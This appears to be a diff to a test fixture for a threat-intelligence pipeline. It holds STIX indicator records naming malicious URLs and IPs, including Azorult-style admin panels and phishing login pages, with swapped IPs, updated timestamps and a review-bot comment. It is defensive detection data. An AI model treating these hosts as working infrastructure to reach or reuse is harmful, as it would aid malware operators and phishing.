CyberCrime\",\"id\":\"indicator--e2cdc754-bf45-4c4e-a98a-0fcc1a62cc63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-28T02:58:19.372Z\",\"name\":\"mal_url: http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.372Z\"}", "category": "threat", "type": "indicator", 
@@ -9147,7 +9147,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385904071Z", + "ingested": "2021-12-13T08:38:40.023600300Z", "original": "{\"created\":\"2020-01-28T02:58:19.396Z\",\"description\":\"TS ID: 55263242003; iType: mal_url; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--f0aa41c1-9c01-420f-9134-20fa6a00f8e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:58:19.396Z\",\"name\":\"mal_url: http://usarmyvacations.info/ssd/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://usarmyvacations.info/ssd/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.396Z\"}", "category": "threat", "type": "indicator", @@ -9198,7 +9198,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385908500Z", + "ingested": "2021-12-13T08:38:40.023605600Z", "original": "{\"created\":\"2020-01-28T02:58:26.492Z\",\"description\":\"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--15b60240-37eb-41c9-9e66-872f19406f6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:58:26.492Z\",\"name\":\"mal_url: http://la6e51ed.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.492Z\"}", "category": "threat", "type": "indicator", 
@@ -9250,7 +9250,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385913018Z", + "ingested": "2021-12-13T08:38:40.023613300Z", "original": "{\"created\":\"2020-01-28T02:58:26.52Z\",\"description\":\"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-28T02:58:26.52Z\",\"name\":\"mal_url: http://209.250.247.253/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.250.247.253/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.52Z\"}", "category": "threat", "type": "indicator", @@ -9302,7 +9302,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385917316Z", + "ingested": "2021-12-13T08:38:40.023650400Z", "original": "{\"created\":\"2020-01-28T02:58:43.041Z\",\"description\":\"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-28T02:58:43.041Z\",\"name\":\"mal_url: http://footlooking.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.041Z\"}", "category": "threat", "type": "indicator", 
@@ -9321,7 +9321,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 2.57.184.184", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-28T02:58:43.095Z", "valid_from": "2020-01-28T02:58:43.095Z", @@ -9343,12 +9343,12 @@ "first_seen": "2020-01-28T02:58:43.095Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "2.57.184.184" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385921654Z", - "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 2.57.184.184\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.57.184.184']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", + "ingested": "2021-12-13T08:38:40.023654900Z", + "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9398,7 +9398,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385925932Z", + "ingested": "2021-12-13T08:38:40.023660600Z", "original": "{\"created\":\"2020-01-28T02:58:45.172Z\",\"description\":\"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1a91efe1-ff09-49b2-801b-fb815c843976\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T02:58:45.172Z\",\"name\":\"mal_url: http://a0377875.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0377875.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:45.172Z\"}", "category": "threat", "type": "indicator", @@ -9450,7 +9450,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385930301Z", + "ingested": "2021-12-13T08:38:40.023664700Z", "original": "{\"created\":\"2020-01-28T02:58:46.345Z\",\"description\":\"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:46.345Z\",\"name\":\"mal_url: http://samaaj.org.pk/ofo/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:46.345Z\"}", "category": "threat", "type": "indicator", 
@@ -9501,7 +9501,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385934669Z", + "ingested": "2021-12-13T08:38:40.023668800Z", "original": "{\"created\":\"2020-01-28T02:58:54.765Z\",\"description\":\"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-28T02:58:54.765Z\",\"name\":\"mal_url: http://f0390226.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390226.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:54.765Z\"}", "category": "threat", "type": "indicator", @@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385938997Z", + "ingested": "2021-12-13T08:38:40.023673200Z", "original": "{\"created\":\"2020-01-28T02:58:57.481Z\",\"description\":\"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:57.481Z\",\"name\":\"mal_url: http://samaaj.org.pk/justices/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:57.481Z\"}", "category": "threat", "type": "indicator", 
@@ -9572,7 +9572,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.3/teejay/logs/omc.php", + "name": "mal_url: http://89.160.20.156/teejay/logs/omc.php", "description": "TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-28T02:59:19.105Z", "valid_from": "2020-01-28T02:59:19.105Z", 
@@ -9597,16 +9597,16 @@ "url": { "path": "/teejay/logs/omc.php", "extension": "php", - "original": "http://193.142.59.3/teejay/logs/omc.php", + "original": "http://89.160.20.156/teejay/logs/omc.php", "scheme": "http", - "domain": "193.142.59.3", - "full": "http://193.142.59.3/teejay/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/teejay/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385943535Z", - "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://193.142.59.3/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.3/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", + "ingested": "2021-12-13T08:38:40.023676700Z", + "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://89.160.20.156/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9624,7 +9624,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 88.119.160.89", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime", "modified": "2020-01-28T02:59:23.530Z", "valid_from": "2020-01-28T02:59:23.53Z", 
@@ -9646,12 +9646,12 @@ "first_seen": "2020-01-28T02:59:23.530Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "88.119.160.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385947773Z", - "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 88.119.160.89\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '88.119.160.89']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", + "ingested": "2021-12-13T08:38:40.023682Z", + "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9701,7 +9701,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385952622Z", + "ingested": "2021-12-13T08:38:40.023688200Z", "original": "{\"created\":\"2020-01-28T02:59:26.887Z\",\"description\":\"TS ID: 55263242013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:59:26.887Z\",\"name\":\"mal_url: http://ld7cad07.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:26.887Z\"}", "category": "threat", "type": "indicator", @@ -9720,7 +9720,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.219.248.137", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime", "modified": "2020-01-28T02:59:27.047Z", "valid_from": "2020-01-28T02:59:27.047Z", 
@@ -9742,12 +9742,12 @@ "first_seen": "2020-01-28T02:59:27.047Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.219.248.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385957361Z", - "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 162.219.248.137\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.219.248.137']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", + "ingested": "2021-12-13T08:38:40.023694400Z", + "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9765,7 +9765,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", + "name": "mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", "description": "TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-28T02:59:34.735Z", "valid_from": "2020-01-28T02:59:34.735Z", 
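Review bot: This hunk, together with the matching `url.original`, `url.domain`, `url.full` and `event.original` rewrites in the `@@ -9790` hunk that follows, substitutes the private RFC 1918 address `192.168.238.10`, while every other substituted host in this chunk uses the public `89.160.20.156`. If the ingest pipeline or any enrichment on `url.domain` treats private ranges differently from public ones, this single indicator exercises a different path from the rest of the fixture, and the reason is not recoverable from the file. If covering the private-range path is the intent, stating so in the PR description would make it deliberate; otherwise using `89.160.20.156` here as well keeps the fixture uniform.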
@@ -9790,16 +9790,16 @@ "url": { "path": "/emmy/PvqDq929BSx_A_D_M1n_a.php", "extension": "php", - "original": "http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", + "original": "http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", "scheme": "http", - "domain": "192.210.238.10", - "full": "http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php" + "domain": "192.168.238.10", + "full": "http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385961740Z", - "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", + "ingested": "2021-12-13T08:38:40.023701600Z", + "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9850,7 +9850,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385966358Z", + "ingested": "2021-12-13T08:38:40.023708800Z", "original": "{\"created\":\"2020-01-28T02:59:34.772Z\",\"description\":\"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime\",\"id\":\"indicator--167c21ca-7d6b-455c-954a-91a5f036616d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:34.772Z\",\"name\":\"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.772Z\"}", "category": "threat", "type": "indicator", @@ -9902,7 +9902,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385970947Z", + "ingested": "2021-12-13T08:38:40.023716Z", "original": "{\"created\":\"2020-01-28T02:59:39.12Z\",\"description\":\"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--8a35f477-32b2-4735-9e85-743115f1e83f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:39.12Z\",\"name\":\"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:39.12Z\"}", "category": "threat", "type": "indicator", 
@@ -9953,7 +9953,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385975766Z", + "ingested": "2021-12-13T08:38:40.023723100Z", "original": "{\"created\":\"2020-01-28T02:59:54.142Z\",\"description\":\"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--efcb1909-e772-4001-a96c-97c293baa98d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:54.142Z\",\"name\":\"mal_url: http://l3b57852.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l3b57852.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.142Z\"}", "category": "threat", "type": "indicator", @@ -10005,7 +10005,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385980084Z", + "ingested": "2021-12-13T08:38:40.023729100Z", "original": "{\"created\":\"2020-01-28T02:59:54.166Z\",\"description\":\"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--b5c97605-a434-4b73-a655-acc88db57cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:54.166Z\",\"name\":\"mal_url: http://samaaj.org.pk/fk/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.166Z\"}", "category": "threat", "type": "indicator", 
@@ -10024,7 +10024,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", + "name": "mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "description": "TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-28T02:59:54.193Z", "valid_from": "2020-01-28T02:59:54.193Z", 
@@ -10049,16 +10049,16 @@ "url": { "path": "/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "extension": "php", - "original": "http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", + "original": "http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "scheme": "http", - "domain": "217.8.117.29", - "full": "http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385984482Z", - "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", + "ingested": "2021-12-13T08:38:40.023735200Z", + "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 
'http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10076,7 +10076,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 82.118.22.36", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime", "modified": "2020-01-28T02:59:54.253Z", "valid_from": "2020-01-28T02:59:54.253Z", 
@@ -10098,12 +10098,12 @@ "first_seen": "2020-01-28T02:59:54.253Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "82.118.22.36" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385988740Z", - "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 82.118.22.36\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '82.118.22.36']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", + "ingested": "2021-12-13T08:38:40.023742500Z", + "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
